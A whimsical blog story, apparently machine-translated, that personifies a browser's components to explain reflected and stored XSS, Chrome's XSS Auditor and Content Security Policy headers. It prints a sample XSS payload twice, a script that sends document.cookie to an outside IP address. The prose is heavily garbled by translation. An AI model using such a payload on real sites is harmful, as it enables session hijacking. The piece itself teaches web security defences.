Mysterious URL
My name is Xiao Feng, is an ordinary office worker in the Windows Empire. Last time I mentioned that I almost lost my job because of a cross-domain request, but fortunately, my career adventure continues.
“Ding ding ding ding ~~~~”, the alarm clock woke me up again, I looked at the time was already so late.
I got up and got ready to go to work. I finally landed a job at the browser company, but I didn’t want to be late.
Today is an ordinary day, soon to the late night, the Internet business is less, I and the small snow sister a total, with the old white responsible for network connection and responsible for the storage of the small black, together played mahjong.
Consecutively dozen a few laps, be excited head, the beauty front desk of the company ran over, “you several individual play, the Internet business came. White, here’s the URL. Here it is.”
I glanced at the URL and it looked strange. Not only was it longer than anything I’d seen before, but it also seemed to have some JavaScript code in it.
http://zone.oo.com/user/info.jsp?desc=”/><script>$(“body”).append(“<img SRC = “http://192.168.59.129?c=” + escape (document. Cookies) + “‘ >”) < / script > <! —
“Old white, this URL long good strange? Will there be any problems?” “I asked White.
“Hi, your boy is new, I have seen the URL than you have executed the JS code are more, what strange shape has not seen, fuss”, old white dismissive.
“Everyone put the card cover, don’t look at, busy finished come back we then play”, the old white continued to say.
So we all went back to our desks and prepared to deal with this single Internet service.
Soon, Bai retrieved the page behind the URL and gave it to Xiao Xue to parse and render.
The light snow did half, called me: “wind brother, there is a
I took the small snow in the hand of the web page, suddenly a look, this is not just URL inside the code? Why is it inside the web page again?
The in the mind suddenly rush on a kind of bad premonition, be in perplexity, old white urge me, “small snow small wind you two hurriedly of, the webpage load along while still did not show!”
I hope I’m thinking too much and I’m starting to execute the code in the
<script>
$("body").append("\ < img SRC =" http://192.168.59.129:10086? c="
+ escape(document.cookie) + "' >")
</script>
Copy the code
I’m going to create a new tag and add it to the body of the page. Take a look at the source of this image, is a new address, and then take the Cookie of the current website as a parameter to get this image.
I came to xiaohei’s storage warehouse, ready to ask him for a Cookie.
When I indicated my intention, Xiaohei was also a little cautious. “According to the company’s regulations, the Cookie of a website cannot be freely accessed by other websites.”
“This I know of course, but now is the website JS code to take out the Cookie to others, this does not violate the company’s regulations,” I explained.
Small black zou frowns to think for a moment, also agreed.
After I got the cookie, I built a complete tag and added it to the DOM tree of the web page, which I then rendered back to Xiao Snow.
Soon the page was rendered and displayed, and after that we continued the unfinished game.
After a while, the humans finally shut down their browsers and we were off duty
XSS cross-site scripting attacks
The next morning, I just arrived at the company, the little snow sister turned and told me: “Brother Wind, the director asked you to go to his office, he seems not very happy, you be careful”
“Do you know what it is?”
“I don’t know. I just heard you executed some bad JavaScript code.”
My in the mind a tight, feel great thing is not good, is last night that strange code have what problem?
Came to the director’s office, saw a young man sitting inside. I gently knocked on the door and asked: “Supervisor, you find me something?”
When the supervisor saw me coming, he pointed to the sofa next to him and motioned for me to sit down.
“You’re in trouble, you know?” “The leader threw me a page of paper.
I picked up the file and saw the weird JavaScript code I had executed last night.
“I don’t know, Sir. What’s the problem?” “I whispered.
The director pointed to the young man next to him and said, “This is the head of OO Space. Let him tell you.”
The little brother nodded and said: “It’s like this. We found that someone embezzled the Cookie of our website and directly accessed it without login. After log investigation, we found that you leaked the Cookie here, so WE want to come to know about the situation.”
“This code is your site’s own, I just did my job and implemented it.” I started to get nervous.
“But we don’t have the code, and we can’t just send cookies,” he argued.
The atmosphere in the office became tense and there was a brief silence.
Just then, the young man went out to take a phone call.
After a moment, the little brother returned to the office again, his face suddenly gentle many, smiled and said: “sorry, just received a colleague’s phone said, they have checked out the problem, is our website to the URL parameters did not check, directly written into the page, was used to pass in THE JS code. I don’t think it’s any of your business. I’m sorry.”
Hearing this, I breathed a sigh of relief and almost took the blame.
Back at my desk, I told them what had happened.
Light snow after listening to ridicule: “those strange strange URL don’t mess up, really give us mess up”
“Look, I thought something was wrong last night. “How about a name for this attack?” hei said. “How about the Cross Site Script attack?”
Old white point nodded, “cross-site scripting attack, well, the summary is in place, then referred to as CSS!”
Small snow a listen to turn head to come, “you call CSS, that my cascade style sheet want to change name to make way for merit?”
Old white scratched scratched his head, some embarrassed, “Oh, forget this stubble. That change, call XSS, this total ok?”
We all nodded and that was it.
XSS Auditor
Although this time the responsibility is not our browser, but I have been a little scared.
That evening I recalled the whole event of the day
Suddenly there was a flash in my mind, and I found an important feature
Since the JS code appears in both the request URL and the response page, why not use this feature for targeted interception?
The more I thought about it, the more difficult it was to fall asleep.
The next day, came to the company, the plan will last night’s program report to the supervisor, earn a performance.
I came to the supervisor’s office again. When the supervisor saw me, he said to me, “Xiao Feng, come here. I just want to talk to you about something.”
I quickly walked in and the director put another stack of documents in front of me and said, “Here’s top secret information I got from XSS Auditor, a technology from our Chrome company next door that is supposed to prevent attacks like the last one. Take a look at it.”
I was so confused that I quickly scanned the document. Unexpectedly, it collided with my plan, and it was more comprehensive and detailed than I thought. I had to quietly pack up the original plan to prepare for the report
A few days later, the director announced that we would use the same technology to enhance the security of our browsers.
Type stored XSS
“Did you hear? “There was an XSS attack on Chrome next door,” white said mysteriously one afternoon.
“I heard that,” XSS Auditor, how can this happen?”
“This time the bad guys have changed their game. They don’t put JS code in the URL, which XSS Auditor won’t notice.”
“It’s not in the URL, so where is it?”
“I heard that there is a database, access to the web page from the database read out, directly to fill the page, like this,” the old white said and drew a picture.
“By the way, they took the opportunity to split XSS attacks into two types: the old XSS attack of injecting JS code directly into a web page through the URL was called reflective XSS, and this one is called stored XSS,” he continued.
I looked at white’s picture and I realized, “This is too hard, it’s in the database of the website, everyone who visits the page has to be hit.”
“Not really, the OO Space site is already in a mess, and they are doing a thorough filtering of all input to prevent JS code from getting in.”
“This kind of thing still must their website oneself do check, our browser also does not help what busy”, the side of small black also inserted a mouth.
We chatted a few words and then scattered.
Although small black said is right, but the last scheme crash, I have not been convinced, this time the opportunity to come, if I can come up with a plan, can this new XSS together to solve the words, then proud.
For a while, I started thinking about it in my spare time, but I didn’t make much progress.
CSP
This day at noon, there is no work to be busy, I thought of this problem, they organized to play mahjong, light snow, I have no idea and refused.
Old white heard the news and said: “Xiao Feng, you are still thinking about that problem, haven’t you read the news these two days, W3C standardization organization launched a new technology, has solved the problem!”
Old white words such as a blow, “what technology? How was it solved?”
“Look at you, studying behind closed doors, you don’t know how fast the outside world is changing. Content Security Policy (CSP)
I hastened to inquire about this new technology called CSP, see straight thigh, I did not think of.
CSP specifies a content-security-policy, which websites use to tell browsers what external resources can be loaded and executed. This information can be presented as an HTTP header, like this:
It can also appear with the
tag, like this:
<meta http-equiv="Content-Security-Policy"
content="script-src 'self'; object-src 'none'; style-src cdn.example.org third-party.org; child-src https:">
Copy the code
The browser will know where to go to load the resource, and refuse to load the resource if it is not in the list:
-script-src: external scripts -style-src: style sheets -img-src: images -media-src: media files (audio and video) -font-src: font files -object-src: Plug-ins (such as Flash) -child-src: frame-frame-rooted: embedded external resource -connect-src: HTTP connection (via XHR, WebSockets, EventSource, etc.) - worker-src: worker script - manifest-src: manifest fileCopy the code
For example, if the content of img-src is self, all tags must have the SRC attribute on the current site. If an image from another location is loaded, it will be rejected.
In addition, it also provides a field called report-URI, which contains the address of a server. When the browser finds that an invalid resource has been loaded, it can not only refuse to load the resource, but also report the situation to the address, so that the website can know the warning in time.
What a perfect solution! Unexpectedly, so many competitors already use this technology
That afternoon, I took the old white to the leadership office, and persuaded him to use this technology in our company.
The annoying XSS attacks were relieved, and we had a rare period of peace.
To be continued
eggs
The days of peace did not last too long. Half a month after that, I was forced to close the browser company by the Imperial Security Guard because of the execution of a JS code occupying the CPU for too long.
The job of executing JavaScript is getting harder and harder.
How to predict the future, please pay attention to the follow-up wonderful…
Previous hot reviews
I almost lost my job because of a cross-domain request
All the other CPU cores went out for one atomic operation
Over! CPU blindly for a quick thing!
Terrible! The CPU has become the hacker’s accomplice!
Which hash table is the best? The big programming languages are at war!
Shock! The network’s first source analysis panorama revealed Nginx
An integer +1 causes a disaster
Catch all in one net! Everything every programmer should know about hacking
DDoS attacks: Infinite war
A Java Object memoir: Garbage Collection
Who’s moving your HTTPS traffic?
Advertising secrets in routers
A fantastical journey through HTTP packets
I am a rogue software thread